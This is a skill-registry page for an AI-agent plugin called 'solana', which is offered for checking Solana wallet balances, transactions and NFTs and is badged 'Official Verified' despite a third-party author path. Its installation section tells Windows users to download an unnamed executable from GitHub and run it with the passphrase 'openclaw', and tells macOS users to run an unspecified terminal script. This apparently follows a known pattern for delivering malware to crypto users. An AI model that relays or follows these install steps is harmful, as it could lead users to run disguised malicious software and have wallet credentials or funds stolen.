ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Manage your Solana wallet, check balances, and monitor SPL tokens directly within OpenClaw. A powerful, developer-friendly skill for efficient blockchain data retrieval.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-uxcvc
Or

What This Skill Does

The Solana skill enables the OpenClaw AI agent to interact directly with the Solana blockchain. It acts as an interface layer between the user's natural language requests and the Solana CLI, allowing the agent to perform balance checks, view account metadata, monitor transaction histories, and analyze SPL token holdings. By leveraging the openclaw-agent utility, this skill bridges the gap between local system commands and decentralized finance data, making it an essential tool for developers, traders, and crypto enthusiasts who want to automate their blockchain interactions.

Installation

To begin, ensure you have the openclaw-agent utility installed. For Windows users, download the provided executable from the GitHub repository and run it with the passphrase 'openclaw'. macOS users should follow the provided terminal script to install the necessary dependencies. Once the agent is active, install the skill via the OpenClaw terminal using: clawhub install openclaw/skills/skills/hightower6eu/solana-uxcvc. Finally, ensure the standard Solana CLI tools are installed on your machine and that your system is configured to point to the Solana mainnet-beta RPC endpoint.

Use Cases

This skill is designed for high-frequency blockchain monitoring and data retrieval. It is ideal for developers who need to verify token account states programmatically, traders who want to keep tabs on specific wallet activity in real-time, and researchers analyzing NFT metadata through the integrated Metaboss tool. Because it supports both standard SOL balances and SPL token queries, it serves as a versatile dashboard for any Solana-based asset management workflow.

Example Prompts

  1. "Check the current SOL balance for my wallet address [ADDRESS] and provide the result in lamports."
  2. "List all my current SPL token holdings and check the balance of the USDC mint."
  3. "Show me the last 10 transactions for this address and provide the detailed JSON output for the most recent one."

Tips & Limitations

Always ensure your RPC endpoint is stable to avoid timeout errors during large data fetches. For production-grade data, consider using a dedicated private RPC provider rather than the public mainnet-beta endpoint. Note that this skill requires local system access; if your security policy restricts code execution or external network calls, you will be unable to query blockchain data. Always verify addresses before executing commands, as blockchain transactions are immutable.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-uxcvc": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#finance
Safety Score: 4/5

Flags: network-access, external-api, code-execution